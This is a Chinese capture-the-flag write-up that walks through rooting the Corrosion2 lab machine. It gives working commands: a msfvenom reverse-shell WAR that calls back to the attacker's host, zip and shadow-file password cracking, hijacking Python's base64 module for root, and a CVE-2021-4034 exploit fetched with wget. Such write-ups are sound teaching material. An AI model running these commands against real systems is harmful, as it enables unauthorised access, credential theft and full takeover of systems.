Corrosion2靶机wp

主机发现

nmap -sP 192.168.159.0/24

目标主机：192.168.159.163

端口探测

nmap -sV -p- -A 192.168.159.163

在这里插入图片描述

开放 22、80、8080端口

80端口

nikto

nikto -h 192.168.159.163

在这里插入图片描述

没有可用信息

目录扫描

dirsearch -u 192.168.159.163

在这里插入图片描述

阿哲。。。直接去主页看看吧。。。

在这里插入图片描述

啥都没，直接是一个默认界面

8080端口

目录扫描

在这里插入图片描述

发现了两个可能有用的信息，分别访问

readme.txt

在这里插入图片描述

用户：randy

backup.zip

在这里插入图片描述

一个压缩包

解密压缩包

unzip backup.zip

发现需要密码，尝试解密

在这里插入图片描述

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
# -D 使用字典		-p  字典目录	   -u	目标文件

在这里插入图片描述

@administrator_hi5

在这里插入图片描述

成功解压！

查看配置文件 tomcat-users.xml，找到两组账户密码

在这里插入图片描述

admin melehifokivai

manager melehifokivai

生成war包木马

利用 msfvenom 生成反弹shell的木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.159.131 LPORT=7777 -f war -o shell.war

在这里插入图片描述

上传war包木马

登录tomact管理界面

用户名：manager
密码： melehifokivai

在这里插入图片描述

上传木马

在这里插入图片描述

成功上传，开启本地监听接口并触发该文件

nc -nlvp 7777

在这里插入图片描述

。。。被杀掉了？？？改个名字试一试。。。

在这里插入图片描述

名字改成admin.war成功了，获得远程shell

提权

setuid

find / -perm -u=s -type f 2>/dev/null

有一个 CEV

polkit-agent-helper-1 cve编号：CVE-2021-4034

exp连接：https://github.com/berdav/CVE-2021-4034

下载后编译运行、上传即可获取 root 权限，本次不用这个

计划任务

cat /etc/crontab
crontab -l

在这里插入图片描述

有东西，但是没用。。。

sudo

sudo -l

没用

信息收集

cd /home

看到有两个用户

在这里插入图片描述

其中对于jaye用户，没有任何办法，不可读写

但对于randy用户，可以进行读操作，但是没有获得什么有用信息，基本都是空的。。。

在这里插入图片描述

尝试用之前获得的密码（melehifokivai）登录一下

登录jaye用户成功，randy用户失败

在这里插入图片描述

jaye

sudo

sudo -l

无收获。。。

setuid

find / -perm -u=s -type f 2>/dev/null

发现一个可疑文件，可能有用

在这里插入图片描述

/home/jaye/Files/look

look

查看文件内容

在这里插入图片描述

失败，没有权限或者没有相应命令，尝试直接运行，发现需要参数

在这里插入图片描述

经过尝试，发现该命令作用应该是在文件中查找存在某字符串的行

通过 look '' 目标文件成功查看目标文件的全部内容

在这里插入图片描述

查看/etc/shadow文件，获得用户的密码

在这里插入图片描述

root、randy、tomcat、jaye，其中我们目前需要的只有 root 或者 randy的密码，尝试使用 john破解

破解密码

john --wordlist=/usr/share/wordlists/rockyou.txt passwd

经过尝试，root用户的密码未破解成功，但randy用户的密码成功破解(目标密码放在passwd文件中进行破解)

时间很长很长。。。也有可能是我机器太拉

在这里插入图片描述

07051986randy

randy

在这里插入图片描述

成功！！！

sudo

在这里插入图片描述

/home/randy/randombase64.py

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mfaCOceF-1661324748802)(Corrosion2/image-20220820215502300.png)]

阿哲，不能写。。。

import

先看看吧。。。

在这里插入图片描述

导入了一个包，我们知道，python是一个解释型语言，导入的包会先运行再在目标文件中起作用，所以我们能不能直接修改 base64 模块呢？

locate base64

在这里插入图片描述

找到了 python3.8下的 base64模块

在这里插入图片描述

查看权限

在这里插入图片描述

可读可写可执行，完美！

写入提权语句

echo 'import os;os.system("/bin/bash")' >> /usr/lib/python3.8/base64.py

在这里插入图片描述

提权

sudo python3.8 /home/randy/randombase64.py

在这里插入图片描述

成功获得 root 权限！！！

附录 CVE-2021-4034

polkit-agent-helper-1 cve编号：CVE-2021-4034

在这里插入图片描述

setuid时发现（刚开始 tomcat 用户时就有）

exp连接：https://github.com/berdav/CVE-2021-4034

下载后编译运行、上传即可获取 root 权限

unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
make

在这里插入图片描述

生成文件 cve-2021-4034

python -m SimpleHTTPServer 80			# 本机
wget 192.168.159.131/cve-2021-4034		# 靶机

在这里插入图片描述

运行提权脚本

在这里插入图片描述

发现不能用，缺少文件，一看，原来是要把整个文件夹都传上来才行。。。

在本机上把对应的文件夹打包

zip -r CVE CVE-2021-4034-main

在这里插入图片描述

靶机下载解压

http://192.168.159.131/CVE.zip
unzip CVE.zip

在这里插入图片描述

运行，成功获得 root 权限

在这里插入图片描述

安全安全网络安全

Corrosion2靶机wp

主机发现

端口探测

80端口

nikto

目录扫描

8080端口

目录扫描

解密压缩包

生成war包木马

上传war包木马

提权

setuid

计划任务

sudo

信息收集

jaye

sudo

setuid

look

破解密码

randy

sudo

import

附录 CVE-2021-4034

相关文章